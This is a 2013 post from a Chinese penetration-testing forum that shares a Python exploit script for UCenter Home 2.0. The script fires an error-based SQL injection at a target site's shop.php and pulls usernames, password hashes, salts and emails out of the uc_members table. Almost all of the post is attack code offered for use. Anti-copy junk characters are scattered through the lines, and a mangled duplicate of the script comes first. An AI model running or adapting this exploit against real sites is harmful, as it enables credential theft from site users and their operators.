找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2375|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl1 ^( P% Q4 @4 x7 m3 G- t2 U7 {6 c  [6 D

/ G3 K3 ?; c5 p) m# v! @5 c0 Q7 M0 r7 K9 [# Q" ?( g
#!/usr/bin/env python  8 ~1 @/ i) k9 F* s
# s% X& {' N. L1 n6 a
import sys  ; d  d& |: J, l. b. q9 B$ c; z
import urllib2  4 T1 U! O& I  S3 o( O, k3 n
import re  ! G. m% |6 B0 m# L
8 J; {0 _2 W* U2 q0 H
def info():  ' j8 G3 n4 k# j' k( d& ?
    print 'From:http://www.exploit-db.com/exploits/14997/' 1 _/ U/ I1 H* a+ H0 _2 c
    print 'http://www.hake.cc/Web_loudong/'
4 g" t, [) w0 g9 g8 T3 \    print 'changed:qiaoy'  % z! ]* N" u3 b) f* a
    print 'exp:'  " E2 T9 E* c3 I- k3 R
    print ' ./UCenter_Home_2.0.py site'  0 U; h  |. D7 V9 g* o- M4 y- G

, o3 q/ w' }' X: B: m) V* rdef main():  ( }; ~" a3 b& w% F' R
    if len(sys.argv) != 2:  - A0 W1 J, I1 r9 s, c" p
        info()  
+ b# r6 T# S2 h. f  I4 [    else:  ; ~; P8 k' O! N' ~
        site = sys.argv[1]  . A8 @, a4 i6 Q4 J% h) ]% Y
        if site[0:7] == 'http://':  9 T+ M6 @6 S6 ^1 l1 W
            sitesite =site  
( K( D! O9 o3 ]' ?3 M. H- }        elif site[0:8] == 'https://':  
% a9 Q( q4 d4 ~. y3 T            sitesite = site  ; p7 Y% U) V8 q% T9 ]/ t7 s" B
        else:  7 j; \5 }8 H. i8 S# d; N+ Z2 p
            site = 'http://'+site  / r% L  a5 P8 |, Z: L
        try:  
' V" U5 [( Y! p2 {9 k0 c* K            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
) A0 D! D. S5 P5 b            Value = urllib2.urlopen(url).read()  
% }: w9 F$ _+ i6 L* C6 i3 W            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
' m! [4 e% J" t/ _. n+ T0 ?            hacked = Msg.split(':')  
: ]+ W( o; q+ M            print 'Name:    '+hacked[1]  7 r" e' _$ o+ J* z# Q4 U# r* L( \
            print 'Passwd:  '+hacked[2]  
6 b* t2 R2 {. j+ }7 J1 b% d4 u            print 'salt:    '+hacked[3]  & u& Y: K6 q5 y2 z8 K, E
            print 'email:   '+hacked[4]  - P6 w' S1 b# Q
        except:  # {/ M% t! R' O3 u5 T$ g
            print 'Sorry,I can\'t work............'  
. \, L$ L* o+ k: v& P; g- D
7 v$ o& J9 O4 d5 ]7 v  ^if __name__ == '__main__':  
% k, H+ o7 L4 C    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表